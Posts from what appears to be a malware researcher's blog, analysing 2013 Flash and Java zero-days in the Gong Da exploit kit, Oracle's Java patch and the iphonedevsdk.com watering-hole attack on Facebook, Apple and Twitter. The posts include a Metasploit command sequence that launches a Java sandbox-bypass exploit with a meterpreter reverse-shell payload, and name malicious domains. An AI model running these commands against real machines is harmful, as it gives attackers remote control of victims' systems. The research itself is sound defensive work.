Posts tagged Oracle
If you are working in computer security and still don’t have heard about the latest Adobe Flash 0days, aka CVE-2013-0633 and CVE-2013-0634, then you should change of job ! These vulnerabilities were found exploited in targeted attacks through spear phishing email messages targeting several industries including the aerospace one.
One of the e-email attached Word document was using the 2013 IEEE Aerospace Conference schedule, and another reported sample was related to online payroll system of ADP US company, to exploit CVE-2013-0633. I wrote a complete blog post regarding this campaign 2 weeks ago.
Adobe fixed the vulnerabilities in APSB13-04 the 7 February, but the vulnerabilities were not found massively exploited in Exploit Kits. Also there was a confusion, by anti-virus vendors and security researchers, regarding CVE-2013-0633 and CVE-2013-0634 detection. But as mentioned in Adobe APSB13-04 CVE-2013-0633 was only exploited by been embedded in Word documents and CVE-2013-0634 was exploited through HTML web pages and by been embedded in Word documents.
So as nobody as seen CVE-2013-0633 working outside a Word document, I will suppose that the vulnerability I discovered exploited in Gong Da exploit kit is potentially a fork of CVE-2013-0633 or could be CVE-2013-0634. Colleagues, you are welcome for comments 🙂
Here is the new code in Gong Da exploit kit.
If you take a look at the ActionScript of “myrF03.swf” (506fe8f82ea151959c5160bc40da25b5) you will see some similarities with CVE-2013-0633, like the “ByteArrayAsset” mentioned by MalwareMustDie, or the well-known “LadyBoyle” function.
This new version was discovered on “hxxp://www.jhtyhtrsgr.com/yymex/index.html” a web site how is actually still online.
“jhtyhtrsgr.com” is hosted on 220.127.116.11, in US and this domain name was created the 22 Feb 2013 with registration informations located in China and the following contact “jing yan ([email protected]) – GuangMing yanjing“.
After de-obfuscation of the “index.html” file you can see that Gong Da Pack has involve to the following diagram.
Here under some information s regarding the different files:
- vQSopE2.jpg (aka CVE-2011-3544) : 10/46 on VirusTotal.com
- ulxzBc7.jpg (aka CVE-2012-0507) : 11/45 on VirusTotal.com
- MQnA3.jpg (aka CVE-2012-1723) : 18/46 on VirusTotal.com
- eATBNfg1.jpg (aka CVE-2012-4681) : 29/46 on VirusTotal.com
- tkPfaMz7.jpg (aka CVE-2012-5076) : 14/46 on VirusTotal.com
- iOiezo6.jpg (aka CVE-2013-0422): 19/46 on VirusTotal.com
- YPVTz8.html (aka CVE-2012-1889): 14/46 on VirusTotal.com
- vQSopE2.html (aka CVE-2012-1889): 12/46 on VirusTotal.com
- myrFO3.swf (aka a fork of
CVE-2013-0633CVE-2013-0634): 8/46 on VirusTotal.com
Here under a demonstration video of
CVE-2013-0633 CVE-2013-0634 without been embeded in a Word document.
Vulnerability discovered and reported to the vendor by Security Explorations the 2013-01-18
Vulnerability patched by the vendor the 2013-02-01
Vulnerability discovered exploited in the wild by kafeine and EKwatcher the 2013-02-18
Metasploit PoC provided the 2013-02-25
PoC provided by :
Affected version(s) :
Java SE 7U11 and previous
Tested on Windows 7 Integral SP1 with :
Java SE 7U11
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.
use exploit/multi/browser/java_jre17_jmxbean_2 set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo
Oracle has provide a Java Critical Patch Update (CPU) Special Update for February 2013 how has been released on Tuesday, February 19. On the 5 security vulnerabilities, fixed in this CPU, all of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 3 vulnerabilities have a CVSS base score upper or equal to 7.0.
As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.
Affected products are:
- JDK and JRE 7 Update 13 and earlier
- JDK and JRE 6 Update 39 and earlier
- JDK and JRE 5.0 Update 39 and earlier
- SDK and JRE 1.4.2_41 and earlier
CVE-2013-1485 has a CVSS base score of 5.0.
CVE-2013-0169 has a CVSS base score of 4.3.
Update: Some worrying information’s at the bottom of the post.
As reported by Ars Technica, the 15th February, Facebook was victim of a watering hole attack, involving a “popular mobile developer Web forum“. The attack was using a Java 0day that has been urgently patched, in Oracle Java CPU of first February, by version 7 update 11 and version 6 update 39.
Ars Technica also pointed that the attack had occur during the same timeframe as the hack that exposed cryptographically hashed passwords at Twitter. Also Twitter was encouraging, the first February, users to disable Java in their browsers. 250 000 user accounts was compromised during the Twitter breach.
Four days after the news on Facebook, the 19 February, Reuters also mentioned Apple as a victim of the Oracle Java 0day. The same “popular mobile developer Web forum” was mentioned, but with the precision that this website is a “popular iPhone mobile developer Web forum”. People briefed on the case said that hundreds of companies were affected by this Java 0day, including defense contractors.
Another interesting fact is that Apple had blacklist Java Web plug-in, a second time in a month, the 31 January, through an update to Xprotect, the Mac OS X “anti-malware” system. Surely a reaction the breach reported in the press 19 days later.
Today, Ars Technica released the name of the “popular iPhone mobile developer Web forum”, aka www.iphonedevsdk.com. Now we can gather some information’s related to this watering hole attack.
On urlQuery we can find an interesting submission, the 23 January, who reveal that some Java code was involved during the visit of the web site.
liveanalytics.org domain name was created the 8
December October 2012, through Public Domain Registry registrar. All contact information’s are hidden behind PrivacyProtect.org. Privacy Protection ensures that private information of domain owners are not published by replacing all the publicly visible contact details with alternate contact information.
But going back on the first urlQuery submission, we can see that www.iphonedevsdk.com website was doing three requests to min.liveanalytics.org website.
Third call was to “empty.htm” with additional parameters who are “empty.htm?id=0&ts=X&n=fp&s=Y“. In the following screenshot you will se that X value of ts variable return the number of milliseconds since 1970/01/01. Also in the following screenshot you will see a base64-encoded string:
Decoded this value is quiet interesting:
These kinds of behaviors make me think to a statistic backend like Jsbug, but I don’t have enough information’s to validate my doubts.
By doing some additional researches on urlQuery, regarding min.liveanalytics.org, we can find a submission dating from the 23 January with one screenshot. And by doing also additional researches on urlQuery, regarding www.iphonedevsdk.com, we can observe that min.liveanalytics.org was down the 24 January.
Now let try other occurrences for www.iphonedevsdk.com or min.liveanalytics.org in search engines & search engines caches. No luck, Google and his cache are not revealing any information’s, same for Bing and other popular search engines. But WayBack Machine is providing a cached version of www.iphonedevsdk.com for the 15 January, and, and you got it Google Chrome is presenting a nice warning screen regarding min.liveanalytics.org 😉
So we have a timeline associated with this domain:
- Domain name was registered the 8
DecemberOctober with hidden information’s
- WayBack Machine cached version of 7 December is not infected.
- WayBack Machine report us that the website was infected the 15 January
- urlQuery & JSUNPACK report us that the website was up the 22/23 January
- urlQuery report us that the website was down the 24 January
Another interesting timeline is the Oracle Java patch and life cycle:
- 11 December 2012: Oracle release, through a CPU, Java SE 7 Update 10 who introduced the levels of security for applet execution.
- 13 January 2013: Oracle release an alert and update, Java SE 7 Update 11, for a Java 0day able to bypass the security manager.
- 1 February 2013: Oracle release, through an out-of-band CPU, Java SE 7 Update 13, in order to fix a 0day exploited in the wild.
As you can see, Java SE 7 Update 10, released the 11 December, has introduce the levels of security (“Medium” by default) and bunch of pop-ups, who are warning you about the trust of an applet. Java SE 7 Update 11, released the 13 January, has force the level of security from “Medium” to “High“. With the “High” setting, the user is always prompted before any unsigned Java applet or Java Web Start application is run.
What I can suppose regarding these timelines:
- First, the victims of this watering hole campaign didn’t have potentially updated to the latest version.
- Second, the victims of this watering hole campaign did have potentially update to JSE 7U11, but have not change the default security level from “Medium” to “High“, despite all the history in Java 0days and advises of security experts.
- Third, the victims, have potentially detect the attack when JSE 7U13 was out, because the “High” security level shown them some unusual applet execution on the “popular iPhone mobile developer Web forum”.
Was this campaign a highly targeted attack? I don’t think so, why because Oracle Java has a long history of 0days, and serious companies like Twitter, Facebook and Apple should have disable Java Web Start application for non trusted applets since a while.
F-Secure has provide in a blog post 2 other domain names involved in the Facebook, Apple and Twitter compromise, this domain name are:
By investigating on these domain names, I found some worrying information’s. If these information’s are confirmed then the story is complete different and could have a bigger impact.
“digitalinsight-ltd.com” domain name was registered the 2012-03-22. By doing some Google dorks we can find these informations:
If you take a look on Wayback Machine, you can find a cached version from 2012-07-12, that makes your Google Chrome screaming….
We can also found a JSUNPACK submission, dating from 2012-10-22 with same source code….